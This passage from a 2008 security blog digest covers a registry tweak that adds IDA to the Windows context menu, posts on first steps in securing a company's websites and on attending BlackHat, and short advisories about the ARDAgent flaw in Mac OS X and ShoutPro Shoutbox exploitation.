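    ; Adjust the idag.exe path to your own installation.

    [HKEY_CLASSES_ROOT\dllfile\shell\Open with IDA]

    [HKEY_CLASSES_ROOT\dllfile\shell\Open with IDA\command]
    @="\"C:\\Program Files\\IDA\\idag.exe\" \"%1\""

    [HKEY_CLASSES_ROOT\exefile\shell\Open with IDA]

    [HKEY_CLASSES_ROOT\exefile\shell\Open with IDA\command]
    @="\"C:\\Program Files\\IDA\\idag.exe\" \"%1\""

Double-clicking the file in Explorer merges it into the registry after a confirmation prompt.
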
After you have added IDA to the extensions you want, find a file to disassemble.  Right-click the file, and select the label you added for IDA from the list.

Adding IDA to the context menu is a very simple action.  But if you are like me and use the application daily, it can really help.  That's all for this week, see you next week.

-Cody

Let’s Start At The Very Beginning [securosis.com]

Posted: 26 Jun 2008 01:44 PM CDT

Last week Jeremiah “Purple Belt” Grossman posted the following question:

“You're hired on at a new company placed in charge of securing their online business (websites). You know next to nothing about the technical details of the infrastructure other than they have no existing web/software security program and a significant portion of the organizations revenues are generated through their websites.

What is the very first thing you do on day 1?”

Day one is going to be a long day, that’s for certain. Like several commentators on the original post, I’d start by talking with the people who own the application at both a business and technology level. Basically, this is a prime opportunity not only to understand the goals of the business but also to get everyone’s perceptions of their needs, and, equally important, their perceptions of the cost of their systems being unavailable. The next few weeks would be used to determine where reality diverged from perception. But day one is when I get to make my first impression, and if I can successfully convince people that I really am on their side, it will make the rest of my tenure much easier. I’ve found that I can do so by demonstrating that my prime concern is enabling the business to accomplish its goals with a minimum of hassle from me. One of the key ways of doing this is spending my time listening, and limiting my talking to asking questions that lead my interviewee to the necessary logical conclusions rather than being a dictator….

…not that I don’t reserve the right to hit things with a hammer later to protect the business, but day 1 sets the tone for the future, and that’s far more important than putting in X fix or blocking Y vulnerability.

Why Do I Attend BlackHat? [Zero in a bit]

Posted: 26 Jun 2008 01:33 PM CDT

This post is a response to Alan Shimel’s Topic of Interest #2 for the Security Bloggers Network.

So what motivates me to attend BlackHat? The #1 reason for me is networking — meeting new people and catching up with old friends and colleagues. Despite our best intentions, we are all busy and our networks are constantly expanding, making it increasingly difficult to stay in touch with old friends in the industry. Twitter and other forms of microblogging help you chip away at the communication gaps; you get a glimpse into people’s lives but it’s no replacement for a real conversation.

Obviously, the briefings themselves are a major draw. Even though it’s expanded to over 10 tracks now, the quality hasn’t suffered much. This year’s experiment with allowing paid delegates to vote on speakers seems to have produced a good lineup, though I’m sure there was still a selection committee that could and probably did overrule the votes in some cases. Either way, BlackHat presentations are a decent indicator of the overarching themes that will be prevalent in information security for the upcoming year or two.

When I first started attending BlackHat, I was drawn to the talks discussing 0-day vulnerabilities, tool releases, shellcode tricks, and the like. These days, anything relating to static analysis, automation, and of course web security is most interesting to me. I also consider who’s speaking, regardless of the topic (e.g., if one of these guys presents, I’m there). In general, I’ll try to gauge how much value the speaker will add to the presentation — in other words, what do I gain by attending the talk vs. flipping through the slides later? I never attend every time slot; sometimes the hallway conversation is just more interesting.

Some of my other reasons for attending, in no particular order, most of which fall under the “networking” umbrella:

  • The parties (duh)
  • The Pwnie Awards
  • Meeting fellow security bloggers
  • Recruiting speakers for SOURCE
  • Finding future Veracode employees
  • Trading war stories
  • Picking up vendor schwag for my kids (RSA is much better for this one)
  • Meeting current and former customers — and future ones, hopefully

Things I could do without:

  • The cigarette smoke
  • The heat
  • Quark’s

I’ve stuck around for DEFCON a couple times in the past, but I don’t anymore. I fly out Friday morning or early afternoon so I get home in time to spend the weekend with the family. Personally, three days in Vegas is plenty for me.

When it gets closer to BlackHat time, I’ll post my picks from the briefings schedule.

Don’t Use chmod To Block Mac OS X ARDAgent Vulnerability [securosis.com]

Posted: 26 Jun 2008 11:02 AM CDT

Just a quick note- if you used chmod to change the permissions of ARDAgent to block the privilege escalation vulnerability being used by the new trojans, you should still go compress or remove it. Repairing permissions restores ARDAgent’s permissions and opens the vulnerability again.

I suppose you could also make sure you don’t repair permissions, but it’s easiest to just remove it.

I removed the chmod recommendation from the TidBITS article.

Be careful if you're running a ShoutPro Shoutbox... [Vitalsecurity.org - A Revolution is the Solution]

Posted: 26 Jun 2008 10:45 AM CDT

There seem to be a number of sites being hit with exploits related to running the ShoutPro Shoutbox. There's an old exploit for it from 2007, but at this point we're not sure if the bad guys are using that or something new. It could be a bunch of script kiddies who saw the old exploit and decided to run wild, but what we're seeing now doesn't really seem to tie in much with the old exploit, so who knows. As the app isn't supported anymore, it seems crazy to have it out there and still available to download and run when there's apparently a way for scumbags to mess with it.

Anybody know if the exploit linked to was ever addressed and / or fixed by the people who made ShoutPro? If it was, I guess it looks like we have a new problem on our hands. My advice? Ditch the shoutbox now to be on the safe side, unless you want phish pages, exes and God knows what else running off your server.
